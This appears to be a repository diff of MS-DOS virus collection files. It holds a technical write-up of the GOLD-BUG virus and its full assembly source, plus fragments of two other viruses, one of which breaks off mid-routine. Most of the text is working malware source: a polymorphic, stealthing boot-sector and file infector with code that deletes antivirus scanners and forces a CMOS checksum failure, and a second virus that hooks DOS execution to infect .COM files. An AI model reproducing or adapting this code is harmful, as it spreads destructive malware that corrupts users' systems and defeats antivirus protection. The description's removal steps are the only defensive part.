DW 37,26,19,25,24,35,7,21,44,-14,18,44
DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29
DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29
DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44
DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0
DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30
DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12
DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5
DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2
DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0
DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25
DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21
DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25
DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46
DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0
patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27
db 31,35,40,45,50,56,61,67,73,80,86,93
mess db 'HARD HIT & HEAVY HATE the HUMANS !!'
db ' [ H.H.& H.H. the H. ] '
drt dw 5 dup (0)
memory:
CODE ENDS
END START
MSDOS/G-Index/Virus.MSDOS.Unknown.gold-bug.asm
+1083
View File
File diff suppressed because it is too large Load Diff
MSDOS/G-Index/Virus.MSDOS.Unknown.gold-bug.txt
+161
View File
@@ -0,0 +1,161 @@
Virus Name: GOLD-BUG
Aliases: AU, GOLD, GOLD-FEVER, GOLD-MINE
V Status: New, Research
Discovery: January, 1994
Symptoms: CMOS checksum failure; Creates files with no extension; Modem
answers on 7th ring; BSC but it is hidden; Most virus scanners
fail to run or are Deleted; CHKLIST.??? files deleted.
Origin: USA
Eff Length: 1,024 Bytes
Type Code: SBERaRbReX - Spawning Color Video Resident and Extended HMA
Memory Resident Boot-Sector and Master-Sector Infector
Detection Method: None
Removal Instructions: See Below
General Comments:
GOLD-BUG is a memory-resident multipartite polymorphic stealthing
boot-sector spawning anti-antivirus virus that works with DOS 5 and
DOS 6 in the HIMEM.SYS memory. When an .EXE program infected with the
GOLD-BUG virus is run, it determines if it is running on an 80186 or
better, if not it will terminate and not install. If it is on an
80186 or better it will copy itself to the partition table of the hard
disk and remain resident in memory in the HMA (High Memory Area) only
if the HMA is available, ie. DOS=HIGH in the CONFIG.SYS file else no
infection will occur. The old partition table is moved to sector 14
and the remainder of the virus code is copied to sector 13. The virus
then executes the spawned associated file if present. INT 13 and
INT 2F are hooked into at this time but not INT 21. The spawning
feature of this virus is not active now.
When the computer is rebooted, the virus goes memory resident in the
color video memory. Also at this time the GOLD-BUG virus removes
itself from the partition table and restores the old one back. Unlike
other boot-sector infectors, it does not use the top of memory to
store the code. CHKDSK does not show a decrease in available memory.
At this time it only hooks INT 10 and monitors when the HMA becomes
available. Once DOS moves into the HMA, then GOLD-BUG moves into the
HMA at address FFFF:FB00 to FFFF:FFFF. If the HMA never becomes
available, ie. DOS loaded LOW or the F5 key hit in DOS 6 to bypass the
CONFIG.SYS, then the virus clears itself from the system memory when
the computer changes into graphics mode. If it moves to the HMA, it
hooks INT 13, INT 21 and INT 2F and then rewrites itself back to the
partition table. The GOLD-BUG virus also has some code that stays
resident in the interrupt vector table to always make the HMA
available to the virus. The full features of the virus are now
active.
The GOLD-BUG virus will infect the boot sector of 1.2M diskettes.
The virus copies itself to the boot sector of the diskette and moves
a copy of the boot sector to sector 28 and the remainder of the code
is copied to sector 27. These are the last 2 sectors of the 1.2M disk
root directory. If there are file entries on sector 27 or 28 it will
not overwrite them with the virus code. It will infect 1.2M disks in
drive A: or B: If a clean boot disk is booted from drive A: and you
try to access C: you will get an invalid drive specification.
The boot-sector infection is somewhat unique. If the computer is
booted with a disk that contains the GOLD-BUG virus, it will remain in
video memory until the HMA is available and then infect the hard disk.
Also at this time, it will remove itself from the 1.2M disk. The
virus will never infect this disk again. It makes tracking where you
got the virus from difficult in that your original infected disk is
not infected anymore.
If an .EXE file less than 64K and greater then 1.5K is executed,
GOLD-BUG will randomly decide to spawn a copy of it. The .EXE file is
renamed to the same file name with no extension, ie. CHKDSK.EXE
becomes CHKDSK. The original file attributes are then changed to
SYSTEM. An .EXE file with the same name is created. This .EXE file
has the same length, file date and attributes as the original .EXE
file. This spawning process will not make a copy on a diskette
because it might be write protected and be detected; but it will make
a spawn .EXE file on a network drive. When a spawned file is created,
CHKLIST.??? of the current directory is also deleted. The .EXE file
that is created is actually a .COM file; it has no .EXE header.
The GOLD-BUG virus is very specific as to what type of .EXE files it
will spawn copies. It will not spawn any Windows .EXE files or any
other .EXE files the use the new extended .EXE header except those
that use the PKLITE extended .EXE header. This way all Windows
programs will continue to run and the virus will still be undetected.
The GOLD-BUG virus is also Polymorphic. Each .EXE file it creates
only has 2 bytes that remain constant. It can mutate into 128
different decription patterns. It uses a double decription technique
that involves INT 3 that makes it very difficult to decript using a
debugger. The assembly code allowed for 512 different front-end
decripters. Each of these can mutate 128 different ways.
The GOLD-BUG virus incorporates an extensive steathing technique. Any
time the hard disk partition table or boot sector of an infected
diskette is examined, the copy of the partition table or boot sector
is returned. If a spawned .EXE file is opened to be read or executed;
the GOLD-BUG virus will redirect to the original file. Windows 3.1
will detect a resident boot-sector virus if the "Use 32 Bit Access" is
enabled on the "Virtual Memory" option. GOLD-BUG will disconnect
itself from the INT 13 chain when Windows installs and reconnect when
Windows uninstalles to avoid being detected. When Windows starts, the
GOLD-BUG virus will copy the original hard disk partition table back.
When Windows ends, the GOLD-BUG virus will reinfect the partition
table.
The GOLD-BUG virus also has an extensive anti-antivirus routine. It
can install itself with programs like VSAFE.COM and DISKMON.EXE
resident that monitor changes to the computer that are common for
viruses. It writes to the disk using the original BIOS INT 13 and not
the INT 13 chain that these types of programs have hooked into. It
hooks into the bottom of the interrupt chain rather than changing and
hooking interrupts; very similar to the tunneling technique. If the
GOLD-BUG virus is resident in memory, any attempts to run most virus
scanners will be aborted. GOLD-BUG stops any large .EXE file
(greater than 64k) with the last two letters of "AN" to "AZ". It will
stop SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE, TNTAV.EXE,
etc., etc. The SCAN program will either be deleted or an execution
error will return. Also, GOLD-BUG will cause a CMOS checksum failure
to happen next time the system boots. GOLD-BUG also erases
"CHKLIST.???" created by CPAV.EXE and MSAV.EXE. Programs that do an
internal checksum on themselves will not detect any changes. The
Thunder Byte Antivirus programs contain a partition table program that
claims it can detect all partition table viruses. GOLD-BUG rides
right through the ThunderByte partition virus checker.
The GOLD-BUG virus detects a modem. If you received an incoming call
on the modem line, GOLD-BUG will output a string that will set the
modem to answer on the seventh ring.
If a program tries to erase the infected .EXE file, the original
program and not the infected .EXE file is erased.
The text strings "AU", "1O7=0SLMTA", and "CHKLIST????" appear in the
decripted code. The virus gets it name from "AU", the chemical
element "GOLD". The text string "CHKLIST????" is actually executable
code.
The GOLD-BUG virus has two companion viruses that it works with. The
DA'BOYS virus is also a boot-sector infector. It is possible to have
a diskette with two boot-sector viruses. GOLD-BUG hides the presence
of the DA'BOYS virus from the Windows 3.1 startup routine. GOLD-BUG
removes the DA'BOYS virus from the INT 13 chain at the start of
Windows and restores it when Windows ends. The GOLD-BUG virus works
with the XYZ virus; it reserves the space FFFF:F900 to FFFF:FAFF in
the HMA for the XYZ virus so it can load as well.
To remove the GOLD-BUG virus, change DOS=HIGH to DOS=LOW in the
CONFIG.SYS, then reboot. Once the system comes up again, reboot from
a clean boot disk. The Virus has now removed itself from the
partition table and memory. With the ATTRIB command check for files
with the SYSTEM bit set that don't have any extension. Delete the
.EXE file associated with the SYSTEM file. Using ATTRIB remove the
SYSTEM attribute. Rename the file with no extension to an .EXE file.
Format each diskette or run SYS to remove the virus from the boot
sector of each 1.2M disk. Any spawned .EXE files copied to diskette
need to be deleted.
Several variations of this virus can exist. The assembly code allowed
for 14 features to be turned on or off: Delete Scanners, Check for
8088, Infect at Random, Deflect Delete, CMOS Bomb, File Reading
Stealth, Same File Date, Double Decription, Execute Spawned, Modem
Code, Anti-Antivirus, Polymorphic, Multipartite and 720K or 1.2M
Diskette Infection. Some of these features can be disabled and more
code added to change the characteristics of this virus.
MSDOS/G-Index/Virus.MSDOS.Unknown.goldbug.asm
+683
View File
@@ -0,0 +1,683 @@
cseg segment para public 'code'
gold_bug proc near
assume cs:cseg
;-----------------------------------------------------------------------------
;designed by "Q" the misanthrope.
;-----------------------------------------------------------------------------
.186
TRUE equ 001h
FALSE equ 000h
;-----------------------------------------------------------------------------
;option bytes used and where
DELETE_SCANNERS equ FALSE ; -2 bytes -2 in com_code
CHECK_FOR_8088 equ TRUE ; 4 bytes 4 in com_code
INFECT_RANDOM equ TRUE ; 4 bytes 4 in com_code
CMOS_BOMB equ TRUE ; 4 bytes 4 in com_code
DEFLECT_DELETE equ TRUE ; 5 bytes 5 in com_code
READING_STEALTH equ TRUE ; 5 bytes 5 in com_code
SAME_FILE_DATE equ TRUE ; 24 bytes 24 in com_code
DOUBLE_DECRYPT equ TRUE ; 26 bytes 26 in com_code
EXECUTE_SPAWNED equ TRUE ; 35 bytes 32 in com_code 3 in boot_code
MODEM_CODE equ TRUE ; 40 bytes 29 in com_code 11 in boot_code
ANTI_ANTIVIRUS equ TRUE ; 46 bytes 35 in com_code 11 in boot_code
POLYMORPHIC equ TRUE ; 90 bytes 74 in com_code 16 in boot_code
MULTIPARTITE equ TRUE ;372 bytes 346 in com_code 26 in boot_code
;-----------------------------------------------------------------------------
;floppy boot infection
FLOPPY_1_2M equ 001h
FLOPPY_760K equ 000h
FLOPPY_TYPE equ FLOPPY_1_2M
;-----------------------------------------------------------------------------
IFE MULTIPARTITE
DELETE_SCANNERS equ FALSE
CHECK_FOR_8088 equ FALSE
INFECT_RANDOM equ FALSE
DEFLECT_DELETE equ FALSE
READING_STEALTH equ FALSE
SAME_FILE_DATE equ FALSE
EXECUTE_SPAWNED equ FALSE
POLYMORPHIC equ FALSE
ENDIF
;-----------------------------------------------------------------------------
SECTOR_SIZE equ 00200h
RES_OFFSET equ 0fb00h
COM_OFFSET equ 00100h
RELATIVE_OFFSET equ RES_OFFSET-COM_OFFSET
PART_OFFSET equ COM_OFFSET+SECTOR_SIZE
BOOT_OFFSET equ 07c00h
RELATIVE_BOOT equ BOOT_OFFSET-PART_OFFSET
LOW_JMP_10 equ 0031ch
LOW_JMP_21 equ 00321h
SAVE_INT_CHAIN equ 0032ch
SCRATCH_AREA equ 08000h
HEADER_SEGMENT equ 00034h
INT_21_IS_NOW equ 0cch
BIOS_INT_13 equ 0c6h
NEW_INT_13_LOOP equ 0cdh
BOOT_SECTOR equ 001h
DESCRIPTOR_OFF equ 015h
IF FLOPPY_TYPE EQ FLOPPY_1_2M
DESCRIPTOR equ 0f909h
OLD_BOOT_SECTOR equ 00eh
COM_CODE_SECTOR equ 00dh
ELSE
DESCRIPTOR equ 0f905h
OLD_BOOT_SECTOR equ 005h
COM_CODE_SECTOR equ 004h
ENDIF
READ_ONLY equ 001h
SYSTEM equ 004h
DELTA_RI equ 004h
DSR equ 020h
CTS equ 010h
CD equ 080h
FAR_JUMP equ 0eah
MIN_FILE_SIZE equ 00500h
PSP_SIZE equ 00100h
VIRGIN_INT_13_A equ 00806h
VIRGIN_INT_13_B equ 007b4h
VIRGIN_INT_2F equ 00706h
FAR_JUMP_OFFSET equ 006h
SET_INT_OFFSET equ 007h
CHANGE_SEG_OFF equ 009h
VIDEO_MODE equ 00449h
MONOCHROME equ 007h
COLOR_VIDEO_MEM equ 0b000h
ADDR_MUL equ 004h
SINGLE_BYTE_INT equ 003h
VIDEO_INT equ 010h
VIDEO_INT_ADDR equ VIDEO_INT*ADDR_MUL
DISK_INT equ 013h
DISK_INT_ADDR equ DISK_INT*ADDR_MUL
SERIAL_INT equ 014h
DOS_INT equ 021h
DOS_INT_ADDR equ DOS_INT*ADDR_MUL
MULTIPLEX_INT equ 02fh
COMMAND_LINE equ 080h
FIRST_FCB equ 05ch
SECOND_FCB equ 06ch
NULL equ 00000h
GET_PORT_STATUS equ 00300h
WRITE_TO_PORT equ 00100h
HD_0_HEAD_0 equ 00080h
READ_A_SECTOR equ 00201h
WRITE_A_SECTOR equ 00301h
GET equ 000h
SET equ 001h
DELETE_W_FCB equ 01300h
DEFAULT_DRIVE equ 000h
GET_DEFAULT_DR equ 01900h
DOS_SET_INT equ 02500h
FILE_DATE_TIME equ 05700h
DENYNONE equ 040h
OPEN_W_HANDLE equ 03d00h
READ_W_HANDLE equ 03f00h
WRITE_W_HANDLE equ 04000h
CLOSE_HANDLE equ 03e00h
UNLINK equ 04100h
FILE_ATTRIBUTES equ 04300h
RESIZE_MEMORY equ 04a00h
QUERY_FREE_HMA equ 04a01h
ALLOCATE_HMA equ 04a02h
EXEC_PROGRAM equ 04b00h
GET_ERROR_LEVEL equ 04d00h
TERMINATE_W_ERR equ 04c00h
RENAME_A_FILE equ 05600h
LSEEK_TO_END equ 04202h
CREATE_NEW_FILE equ 05b00h
RESIDENT_LENGTH equ 068h
PARAMETER_TABLE equ 005f1h
MAX_PATH_LENGTH equ 00080h
EXE_HEADER_SIZE equ 020h
NEW_EXE_HEADER equ 00040h
NEW_EXE_OFFSET equ 018h
PKLITE_SIGN equ 'KP'
PKLITE_OFFSET equ 01eh
NO_OF_COM_PORTS equ 004h
WINDOWS_BEGIN equ 01605h
WINDOWS_END equ 01606h
ERROR_IN_EXE equ 0000bh
IF POLYMORPHIC
FILE_SIGNATURE equ 07081h
XOR_SWAP_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+TWO_BYTES
FILE_LEN_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+THREE_BYTES
FIRST_UNDO_OFF equ byte ptr ((offset first_jmp)-(offset com_code)+ONE_BYTE)
SECOND_UNDO_OFF equ byte ptr ((offset second_jmp)-(offset com_code))
BL_BX_OFFSET equ byte ptr ((offset incbl_incbx)-(offset com_code))
ROTATED_OFFSET equ byte ptr ((offset rotated_code)-(offset com_code))
ELSE
FILE_SIGNATURE equ 0070eh
ENDIF
IF MODEM_CODE
STRING_LENGTH equ byte ptr ((offset partition_sig)-(offset string))
ENDIF
IF EXECUTE_SPAWNED
EXEC_SUBTRACT equ byte ptr ((offset file_name)-(offset exec_table))
ENDIF
DH_OFFSET equ byte ptr ((offset dh_value )-(offset initialize_boot)+TWO_BYTES)
ONE_NIBBLE equ 004h
ONE_BYTE equ 001h
TWO_BYTES equ 002h
THREE_BYTES equ 003h
FOUR_BYTES equ 004h
FIVE_BYTES equ 005h
FIVE_BITS equ 005h
EIGHT_BYTES equ 008h
USING_HARD_DISK equ 080h
KEEP_CF_INTACT equ 002h
CMOS_CRC_ERROR equ 02eh
CMOS_PORT equ 070h
REMOVE_NOP equ 001h
CR equ 00dh
LF equ 00ah
INT3_INCBX equ 043cch
INC_BL equ 0c3feh
INCBX_INCBL_XOR equ INT3_INCBX XOR INC_BL
JMP_NO_SIGN equ 079h
JMP_NOT_ZERO equ 075h
JNS_JNZ_XOR equ JMP_NO_SIGN XOR JMP_NOT_ZERO
CLI_PUSHCS equ 00efah
;-----------------------------------------------------------------------------
video_seg segment at 0c000h
org 00000h
original_int_10 label word
video_seg ends
;-----------------------------------------------------------------------------
io_seg segment at 00070h
org 00893h
original_2f_jmp label word
io_seg ends
;-----------------------------------------------------------------------------
org COM_OFFSET
com_code:
;-----------------------------------------------------------------------------
IF POLYMORPHIC
first_decode proc near
serial_number: xor word ptr ds:[si+bx+FIRST_UNDO_OFF],MIN_FILE_SIZE
org $-REMOVE_NOP
org $-FIVE_BYTES
jmp load_it
org $+TWO_BYTES
rotated_code: int SINGLE_BYTE_INT
into
adc al,0d4h
incbl_incbx: inc bl
first_jmp: jnz serial_number
add bx,si
jns serial_number
first_decode endp
;-----------------------------------------------------------------------------
IF DOUBLE_DECRYPT
second_decode proc near
push si
get_next_byte: lodsw
add bx,ax
inc bx
xor byte ptr ds:[si+SECOND_UNDO_OFF],bl
org $-REMOVE_NOP
dec si
second_jmp: jns get_next_byte
pop si
second_decode endp
ENDIF
ENDIF
;-----------------------------------------------------------------------------
com_start proc near
IF MULTIPARTITE
push cs
pop es
call full_move_w_si
mov ds,cx
cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL]
jne dont_set_int
mov di,VIRGIN_INT_13_B
call set_both_ints
push cs
pop es
ENDIF
dont_set_int: IF CHECK_FOR_8088
mov cl,RESIDENT_LENGTH
mov al,high(RESIZE_MEMORY)
shl ax,cl
mov bx,cx
int DOS_INT
ELSEIF MULTIPARTITE
mov bx,RESIDENT_LENGTH
mov ah,high(RESIZE_MEMORY)
int DOS_INT
ENDIF
IF EXECUTE_SPAWNED
pusha
call from_com_code+RELATIVE_OFFSET
popa
push cs
pop ds
push cs
pop es
cmpsw
mov dx,si
sub si,EXEC_SUBTRACT
org $-REMOVE_NOP
mov bx,PARAMETER_TABLE
mov di,bx
mov ax,EXEC_PROGRAM
set_table: scasw
movsb
scasb
mov word ptr ds:[di],ds
je set_table
int DOS_INT
mov ah,high(GET_ERROR_LEVEL)
int DOS_INT
mov ah,high(TERMINATE_W_ERR)
ELSEIF MULTIPARTITE
call from_com_code+RELATIVE_OFFSET
mov ax,TERMINATE_W_ERR
ENDIF
IF MULTIPARTITE
int DOS_INT
ELSE
jmp boot_load
ENDIF
com_start endp
;-----------------------------------------------------------------------------
high_code proc near
mov dx,offset int_10_start+RELATIVE_OFFSET
mov bx,LOW_JMP_10-FAR_JUMP_OFFSET
call set_int_10_21
mov bx,VIDEO_INT_ADDR-SET_INT_OFFSET
low_code: mov es,cx
mov cl,OLD_BOOT_SECTOR
mov dx,LOW_JMP_10
call set_interrupt
mov bx,BOOT_OFFSET
pop dx
int DISK_INT
xor dh,dh
mov cl,BOOT_SECTOR
mov ax,WRITE_A_SECTOR
high_code endp
;-----------------------------------------------------------------------------
interrupt_13 proc far
int_13_start: IF MULTIPARTITE
mov byte ptr cs:[drive_letter+ONE_BYTE+RELATIVE_OFFSET],dl
ENDIF
cmp cx,BOOT_SECTOR
jne no_boot_sector
cmp ah,high(READ_A_SECTOR)
jne no_boot_sector
cmp dx,HD_0_HEAD_0
jbe reread_boot
no_boot_sector: int NEW_INT_13_LOOP
jmp short return_far
reread_boot: int NEW_INT_13_LOOP
jc return_far
pusha
push ds
push es
pop ds
check_old_boot: mov ax,READ_A_SECTOR
xor dh,dh
mov cl,OLD_BOOT_SECTOR
IF ANTI_ANTIVIRUS
cmp word ptr ds:[bx],'HC'
ELSE
cmp word ptr ds:[bx],CLI_PUSHCS
ENDIF
je read_old_boot
test dl,USING_HARD_DISK
jnz encode_hd
cmp word ptr ds:[bx+DESCRIPTOR_OFF-ONE_BYTE],DESCRIPTOR
jne time_to_leave
mov dh,al
pusha
int NEW_INT_13_LOOP
cmp byte ptr ds:[bx],ch
popa
pushf
pusha
xor dh,dh
mov cl,al
int NEW_INT_13_LOOP
popa
popf
jne time_to_leave
encode_hd: mov ah,high(WRITE_A_SECTOR)
push ax
int NEW_INT_13_LOOP
pop ax
jc time_to_leave
mov di,bx
call move_code
mov cl,COM_CODE_SECTOR
IF POLYMORPHIC
xor byte ptr ds:[bx+XOR_SWAP_OFFSET],dh
org $-REMOVE_NOP
jo dont_flip_it
xchg word ptr ds:[bx+ROTATED_OFFSET],ax
org $-REMOVE_NOP
xchg ah,al
xchg word ptr ds:[bx+ROTATED_OFFSET+TWO_BYTES],ax
org $-REMOVE_NOP
xchg word ptr ds:[bx+ROTATED_OFFSET],ax
org $-REMOVE_NOP
ENDIF
dont_flip_it: pusha
int NEW_INT_13_LOOP
popa
mov di,bx
call move_some_more
mov byte ptr ds:[bx+DH_OFFSET],dh
org $-REMOVE_NOP
mov dh,cl
inc cx
int NEW_INT_13_LOOP
jmp short check_old_boot
read_old_boot: mov dh,byte ptr ds:[bx+DH_OFFSET]
org $-REMOVE_NOP
int NEW_INT_13_LOOP
time_to_leave: pop ds
popa
clc
return_far: retf KEEP_CF_INTACT
interrupt_13 endp
;-----------------------------------------------------------------------------
interrupt_2f proc far
pusha
push ds
push es
push offset return_to_2f+RELATIVE_OFFSET
xor cx,cx
mov ds,cx
mov bx,SAVE_INT_CHAIN-SET_INT_OFFSET
cmp ax,WINDOWS_END
jne try_another
les dx,dword ptr ds:[bx+SET_INT_OFFSET]
jmp short set_13_chain
try_another: cmp ax,WINDOWS_BEGIN
jne another_return
mov di,VIRGIN_INT_13_B
call get_n_set_int+ONE_BYTE
les dx,dword ptr ds:[BIOS_INT_13*ADDR_MUL]
set_13_chain: mov ax,READ_A_SECTOR
call get_set_part
mov bx,VIRGIN_INT_13_B-SET_INT_OFFSET
call set_interrupt
mov bl,low(VIRGIN_INT_13_A-SET_INT_OFFSET)
call set_interrupt
mov ah,high(WRITE_A_SECTOR)
interrupt_2f endp
;-----------------------------------------------------------------------------
get_set_part proc near
pusha
push es
mov bx,SCRATCH_AREA
mov es,bx
mov dx,HD_0_HEAD_0
inc cx
int NEW_INT_13_LOOP
mov ax,READ_A_SECTOR
int DISK_INT
pop es
popa
another_return: ret
get_set_part endp
;-----------------------------------------------------------------------------
return_to_2f proc near
pop es
pop ds
popa
jmp far ptr original_2f_jmp
return_to_2f endp
;-----------------------------------------------------------------------------
interrupt_10 proc far
int_10_start: pushf
pusha
push ds
push es
push offset a_return+RELATIVE_OFFSET
from_com_code: xor bx,bx
mov ds,bx
or ah,ah
jz set_10_back
mov ax,QUERY_FREE_HMA
int MULTIPLEX_INT
cmp bh,high(MIN_FILE_SIZE+SECTOR_SIZE)
jb another_return
mov ax,ALLOCATE_HMA
int MULTIPLEX_INT
clc
call full_move_w_di
mov dx,offset int_13_start+RELATIVE_OFFSET
call set_13_chain
mov bx,VIRGIN_INT_2F-SET_INT_OFFSET
mov dx,offset interrupt_2f+RELATIVE_OFFSET
call set_interrupt
cmp word ptr ds:[LOW_JMP_10],cx
je set_10_back
push es
push es
mov di,DOS_INT_ADDR
mov bx,INT_21_IS_NOW*ADDR_MUL-SET_INT_OFFSET
call get_n_set_int+ONE_BYTE
pop ds
mov bx,offset old_int_10_21-SET_INT_OFFSET+RELATIVE_OFFSET+ONE_BYTE
call set_interrupt
mov ds,cx
mov ax,DOS_SET_INT+DOS_INT
mov dx,LOW_JMP_21
int INT_21_IS_NOW
pop es
mov bx,dx
mov dx,offset interrupt_21+RELATIVE_OFFSET
mov word ptr ds:[bx],0b450h
mov word ptr ds:[bx+TWO_BYTES],0cd19h
mov word ptr ds:[bx+FOUR_BYTES],05800h+INT_21_IS_NOW
call set_int_10_21
set_10_back: mov di,offset old_int_10_21+RELATIVE_OFFSET+ONE_BYTE
mov bx,LOW_JMP_10-FAR_JUMP_OFFSET
interrupt_10 endp
;-----------------------------------------------------------------------------
get_n_set_int proc near
les dx,dword ptr cs:[di]
jmp short set_interrupt
set_int_10_21: mov byte ptr ds:[bx+FAR_JUMP_OFFSET],FAR_JUMP
set_interrupt: mov word ptr ds:[bx+SET_INT_OFFSET],dx
mov word ptr ds:[bx+CHANGE_SEG_OFF],es
ret
get_n_set_int endp
;-----------------------------------------------------------------------------
IF MULTIPARTITE
set_both_ints proc near
mov bx,(NEW_INT_13_LOOP*ADDR_MUL)-SET_INT_OFFSET
call get_n_set_int+ONE_BYTE
mov bl,low(BIOS_INT_13*ADDR_MUL)-SET_INT_OFFSET
jmp short set_interrupt
set_both_ints endp
ENDIF
;-----------------------------------------------------------------------------
IF EXECUTE_SPAWNED
exec_table db COMMAND_LINE,FIRST_FCB,SECOND_FCB
ENDIF
;-----------------------------------------------------------------------------
IF MODEM_CODE
org PART_OFFSET+001f3h
string db CR,'1O7=0SLMTA'
ENDIF
;-----------------------------------------------------------------------------
org PART_OFFSET+SECTOR_SIZE-TWO_BYTES
partition_sig dw 0aa55h
;-----------------------------------------------------------------------------
org PART_OFFSET+SECTOR_SIZE+TWO_BYTES
file_name db 'DA',027h,'BOYS.COM',NULL
;-----------------------------------------------------------------------------
org PARAMETER_TABLE
dw NULL,NULL,NULL,NULL,NULL,NULL,NULL
db NULL
;-----------------------------------------------------------------------------
IFE MULTIPARTITE
boot_load proc near
push cs
pop es
call full_move_w_si
mov ds,cx
cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL]
jne dont_set_intcd
lds dx,dword ptr ds:[VIRGIN_INT_13_B]
mov ax,DOS_SET_INT+NEW_INT_13_LOOP
int DOS_INT
dont_set_intcd: mov ah,high(GET_DEFAULT_DR)
int DOS_INT
call from_com_code+RELATIVE_OFFSET
mov ax,TERMINATE_W_ERR
int DOS_INT
boot_load endp
ENDIF
;-----------------------------------------------------------------------------
IF POLYMORPHIC
load_it proc near
mov word ptr ds:[si],FILE_SIGNATURE
mov byte ptr ds:[si+TWO_BYTES],FIRST_UNDO_OFF
push bx
xor ax,ax
cli
out 043h,al
in al,040h
mov ah,al
in al,040h
sti
push ax
and ax,0001eh
mov bx,ax
mov ax,word ptr ds:[bx+two_byte_table]
mov word ptr ds:[si+ROTATED_OFFSET+TWO_BYTES],ax
org $-REMOVE_NOP
pop ax
and ax,003e0h
mov cl,FIVE_BITS
shr ax,cl
mov bx,ax
mov al,byte ptr ds:[bx+one_byte_table]
xor al,low(INC_BL)
mov byte ptr ds:[swap_incbx_bl+THREE_BYTES],al
pop bx
jmp com_start
load_it endp
;-----------------------------------------------------------------------------
two_byte_table: mov al,0b2h
xor al,0b4h
and al,0d4h
les ax,dword ptr ds:[si]
les cx,dword ptr ds:[si]
les bp,dword ptr ds:[si]
adc al,0d4h
and al,084h
adc al,084h
adc al,024h
add al,084h
add al,014h
add al,024h
test dl,ah
repz stc
repnz stc
;-----------------------------------------------------------------------------
one_byte_table: int SINGLE_BYTE_INT
into
daa
das
aaa
aas
inc ax
inc cx
inc dx
inc bp
inc di
dec ax
dec cx
dec dx
dec bp
dec di
nop
xchg ax,cx
xchg ax,dx
xchg ax,bp
xchg ax,di
cbw
cwd
lahf
scasb
scasw
xlat
repnz
repz
cmc
clc
stc
ENDIF
;-----------------------------------------------------------------------------
gold_bug endp
cseg ends
end com_code
MSDOS/G-Index/Virus.MSDOS.Unknown.gollum.asm
+1027
View File
File diff suppressed because it is too large Load Diff
MSDOS/G-Index/Virus.MSDOS.Unknown.gomb.asm
+900
View File
@@ -0,0 +1,900 @@
CODE segment para public 'code'
assume cs:code,ds:code,es:nothing,ss:nothing
org 100h
egy equ 1 ; one
dma equ 0b0h
atvar equ 300 ; at paramaeter
xtvar equ 1 ; xt parameter
suruseg equ 255 ; density
idotartalek equ 18*30 ; time delay
start: db 0e9h,0,0
;##################### Initialization ######################
resid: push ax
mov cx,offset memory - offset begin ;#### decoding ####
mov bx,ds:[101h]
add bx,103h+(offset begin-offset resid)
jhg1: xor byte ptr [bx],0
inc bx
loop jhg1
begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin)
mov cs:[0feh],bx
mov ax,[bx+(offset eltarol-offset resid)]
mov cl,[bx+(offset eltarol-offset resid)+2]
mov ds:[100h],ax
mov ds:[102h],cl
mov cx,0b800h
mov ah,15
push bx
int 10h
pop bx
cmp al,7
jne rety
mov ch,0b0h
rety: mov [bx+(offset ruut - offset resid)+1],cx
mov word ptr [bx+(offset counter-offset resid)],idotartalek
mov byte ptr [bx+(offset jammed-offset resid)+1],al
mov byte ptr [bx+(offset vanesik-offset resid)],0
xor ax,ax
mov ds,ax
cmp word ptr ds:[130h],4142h
je zipp
mov ds:[130h],4142h
mov ax,cs
dec ax
mov ds,ax
mov ax,ds:[3]
sub ax,180h
mov ds:[3],ax
add ax,ds:[1]
mov es,ax
push cs
pop ds
sub word ptr ds:[2],384
mov di,3
mov si,bx
mov cx,(offset memory-offset resid) shr 1 +1
cld
rep movsw
mov ax,es
sub ax,10h
mov ds,ax
mov dx,offset irq
mov ax,251ch
int 21h
mov ah,2ah
int 21h
cmp al,1
jne zipp
dec al
out 0a0h,al
mov al,dma
out 41h,al
zipp:
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push cs
mov cx,100h
push cx
mov cx,ds:[0feh]
sub cx,100h
retf
eltarol dw 20cdh
eltarol2 db 90h
;######################### Vyrus activated ##########################
csik: mov ax,0e000h
mov ds,ax
csiky: mov ds:[0],al
inc al
jmp csiky
;######################### propagation part ##########################
eredeti: db 0eah ; original
int211 dw 0
int212 dw 0
counter dw 0
szaporodas: cmp ah,4bh
jne eredeti
or al,al
jnz eredeti
push ax
push es
push bx
push ds
push dx
mov bx,dx
koj: inc bx
cmp byte ptr [bx],'.'
jne koj
cmp byte ptr[bx+1],'C'
jne kiugras1
mov cs:kds,ds
mov cs:kdx,dx
mov cs:kbx,bx
call probe
kiugras1: pop dx
pop ds
pop bx
pop es
pop ax
jmp eredeti
kds dw 0
kdx dw 0
kbx dw 0
kkk dw 0
fszam dw 0
probe: push cs
pop es
mov di,offset memory
mov si,dx
mov cx,40
cld
rep movsw
mov bx,0ff0h
mov ah,48h
int 21h
jnc juk1
ret
;!!!!! memoria lefoglalva (kkk = Seg)
atr dw 0
juk1: mov cs:kkk,ax
mov dx,offset memory
push ds
pop es
mov bx,cs:kbx
mov byte ptr [bx+1],'A'
call elorutin
push cs
pop ds ;DS:DX a masolt nev.
mov ax,4300h
int 21h
mov atr,cx
xor cx,cx
mov ax,4301h
int 21h
;!!!!! Attr allitas
cmp cs:attrflag,0
jz juk2
mov ds,cs:kds
jmp memoff
juk2: mov di,kdx ;ES:DI a regi nev atirva
mov ah,56h
int 21h
call utorutin ;!!!!! Atnevezve
mov dx,cs:kdx
push es
pop ds
mov ax,3d02h
